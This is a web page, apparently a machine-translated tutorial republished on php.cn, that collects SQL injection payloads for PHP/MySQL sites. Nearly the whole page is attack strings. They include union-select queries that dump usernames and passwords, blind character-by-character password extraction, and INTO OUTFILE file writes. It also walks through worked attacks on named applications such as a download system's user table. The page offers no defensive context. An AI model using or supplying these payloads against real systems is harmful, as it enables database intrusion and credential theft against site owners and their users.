http://www.56.com/m2v/?magic=1 Collection of advanced PHP injection methods Page 1/2

WBOY
Release: 2016-07-29 08:38:25
Original
1391 people have browsed it

'%23
' and passWord='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1 ,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3 ,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (The ord function is very useful, you can Return integer)
' and LENGTH(password)='6 (detect password length)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
……………… …………and so on
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (can be 1 or = followed directly)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (export file)
=' or 1=1 into outfile 'c:/file. txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id= ' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (Flexible application query)
Common query test statements,
select * FROM table where 1=1
select *From table where 'uuu' = 'uuu'
select*from table where 1 & lt; & gt; 2
Select*from table where 3 & gt; 2
Select*from table where 2 & lt; 3
s Elect*from table where 1
Select* FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2 )
select * FROM table where CASE WHEN 1>0 THEN 1 END
For example: Night Cat download system version 1.0
id=1 union select 1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (replace, find password)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (verify the first password)
union select 1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (second position)
union select 1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1)) =51
……………………………………………………………………………………
Example 2: Gray track Transform id for testing (meteor)
union%20(select%20allowsmilies,public,userid ,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,' 0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

Current 1/2 page 12Next page

The above introduces http://www.56.com/m2v/?magic=1 Advanced PHP injection method collection on page 1/2, including http://www.56.com/m2v/?magic=1 aspects The content, I hope it will be helpful to friends who are interested in PHP tutorials.

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!